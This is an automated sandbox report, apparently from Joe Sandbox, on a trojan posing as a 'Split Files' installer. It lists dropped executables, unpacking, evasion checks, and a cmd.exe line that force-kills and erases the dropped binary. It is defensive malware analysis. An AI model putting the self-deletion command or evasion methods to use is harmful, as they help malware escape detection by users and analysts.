Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00457F04	4_2_00457F04
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00404490	5_2_00404490
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_004096F0	5_2_004096F0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_004056A0	5_2_004056A0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00406800	5_2_00406800
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00406AA0	5_2_00406AA0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00404D40	5_2_00404D40
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00405F40	5_2_00405F40
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00402F20	5_2_00402F20
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_004150D3	5_2_004150D3
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00415305	5_2_00415305
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_004223A9	5_2_004223A9
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00419510	5_2_00419510
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00404840	5_2_00404840
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00426850	5_2_00426850
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00410A50	5_2_00410A50
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_0042AB9A	5_2_0042AB9A
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00421C88	5_2_00421C88
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_0042ACBA	5_2_0042ACBA
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00447D2D	5_2_00447D2D
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00428D39	5_2_00428D39
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00404F20	5_2_00404F20
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_1000F670	5_2_1000F670
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_1000EC61	5_2_1000EC61
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe	Code function: 6_2_0010AE8D	6_2_0010AE8D

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: String function: 004035DC appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: String function: 00408CA0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: String function: 00403548 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: String function: 00446194 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: String function: 00445EC4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: String function: 004037CC appears 193 times
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: String function: 0043477C appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: String function: 00455D54 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: String function: 00407988 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: String function: 00455B64 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: String function: 00451DE8 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: String function: 00405A9C appears 92 times
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: String function: 10003C50 appears 34 times
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: String function: 0040F9E0 appears 54 times

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00423C4C NtdllDefWindowProc_A,	4_2_00423C4C
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_004126A0 NtdllDefWindowProc_A,	4_2_004126A0
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00455514 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,	4_2_00455514

Source: is-DTRND.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-DTRND.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-DTRND.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-AGVDF.tmp.4.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-AGVDF.tmp.4.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-AGVDF.tmp.4.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: file.exe, 00000001.00000000.288145958.0000000000417000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename" vs file.exe
Source: file.exe, 00000001.00000003.289316432.00000000020FD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000001.00000003.289316432.00000000020FD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe, 00000001.00000003.288963142.00000000022D9000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000001.00000003.288963142.00000000022D9000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilename" vs file.exe

Source: Joe Sandbox View

Dropped File: C:\Program Files (x86)\Split Files\is-AGVDF.tmp 1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9

Source: SplitFiles131.exe.4.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp "C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp" /SL4 $902D6 "C:\Users\user\Desktop\file.exe" 1818498 170496
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp "C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp" /SL4 $902D6 "C:\Users\user\Desktop\file.exe" 1818498 170496	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"	Jump to behavior
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe	Jump to behavior
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040910C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6CF44E70,		1_2_0040910C
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00453D80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6CF44E70,		4_2_00453D80

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SplitFiles131.exe")

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winEXE@12/39@0/5

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

5_2_00401B30

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp

Code function: 4_2_004547A0 GetModuleHandleA,6CAD5550,GetDiskFreeSpaceA,

4_2_004547A0

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

Code function: 5_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

5_2_00402BF0

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

Code function: 5_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,

5_2_00405350

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_01

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp

Code function: 4_2_0040B090 FindResourceA,FreeResource,

4_2_0040B090

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp

File created: C:\Program Files (x86)\Split Files

Jump to behavior

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Command line argument: `a}{	5_2_004096F0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Command line argument: MFE.	5_2_004096F0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Command line argument: ZK]Z	5_2_004096F0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Command line argument: ZK]Z	5_2_004096F0

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 2094367 > 1048576

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

Unpacked PE file: 5.2.SplitFiles131.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

Unpacked PE file: 5.2.SplitFiles131.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.ave131:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00406594 push 004065D1h; ret	1_2_004065C9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00404159 push eax; ret	1_2_00404195
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00404229 push 00404435h; ret	1_2_0040442D
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004042AA push 00404435h; ret	1_2_0040442D
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00404327 push 00404435h; ret	1_2_0040442D
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00408BDC push 00408C0Fh; ret	1_2_00408C07
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040438C push 00404435h; ret	1_2_0040442D
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00407F3C push ecx; mov dword ptr [esp], eax	1_2_00407F41
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00409A20 push 00409A5Dh; ret	4_2_00409A55
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0040A107 push ds; ret	4_2_0040A108
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_004302D0 push ecx; mov dword ptr [esp], eax	4_2_004302D5
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_004063C0 push ecx; mov dword ptr [esp], eax	4_2_004063C1
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_004785C8 push 00478673h; ret	4_2_0047866B
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00410798 push ecx; mov dword ptr [esp], edx	4_2_0041079D
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_004129F0 push 00412A53h; ret	4_2_00412A4B
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0045AA9C push ecx; mov dword ptr [esp], eax	4_2_0045AAA1
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00450EB4 push 00450EE7h; ret	4_2_00450EDF
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0040D0F0 push ecx; mov dword ptr [esp], edx	4_2_0040D0F2
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00443530 push ecx; mov dword ptr [esp], ecx	4_2_00443534
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_004055BD push eax; ret	4_2_004055F9
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0040F650 push ecx; mov dword ptr [esp], edx	4_2_0040F652
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0040568D push 00405899h; ret	4_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0040570E push 00405899h; ret	4_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_004057F0 push 00405899h; ret	4_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0040578B push 00405899h; ret	4_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00479B20 push ecx; mov dword ptr [esp], ecx	4_2_00479B25
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00419CF0 push ecx; mov dword ptr [esp], ecx	4_2_00419CF5
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_004311AD push esi; ret	5_2_004311B6
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_0040F4BB push ecx; ret	5_2_0040F4CE

Source: SplitFiles131.exe.4.dr

Static PE information: section name: .ave131

Source: initial sample

Static PE information: section name: .text entropy: 7.2455087113234224

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	File created: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	File created: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_iscrypt.dll	Jump to dropped file
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	File created: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	File created: C:\Program Files (x86)\Split Files\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	File created: C:\Program Files (x86)\Split Files\is-AGVDF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	File created: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_shfoldr.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	4_2_00423CD4
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	4_2_00423CD4
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00478118 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,	4_2_00478118
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0042425C IsIconic,SetActiveWindow,	4_2_0042425C
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_004242A4 IsIconic,SetActiveWindow,SetFocus,	4_2_004242A4
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0041844C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	4_2_0041844C
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00422924 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	4_2_00422924
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00417660 IsIconic,GetCapture,	4_2_00417660
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00417D96 IsIconic,SetWindowPos,	4_2_00417D96
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00417D98 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	4_2_00417D98

Source: C:\Users\user\Desktop\file.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe TID: 996

Thread sleep count: 31 > 30

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_1-5522

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\is-AGVDF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_shfoldr.dll	Jump to dropped file

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_5-35022

Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe

API coverage: 9.8 %

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,

5_2_004056A0

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00409764 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

1_2_00409764

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose,	4_2_0046CA68
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,	4_2_00474A14
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0045157C FindFirstFileA,GetLastError,	4_2_0045157C
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	4_2_0045E244
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0048AC5C FindFirstFileA,6CAD69D0,FindNextFileA,FindClose,	4_2_0048AC5C
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,	4_2_00472CD4
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose,	4_2_0045CDA4
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	4_2_0045DEB0
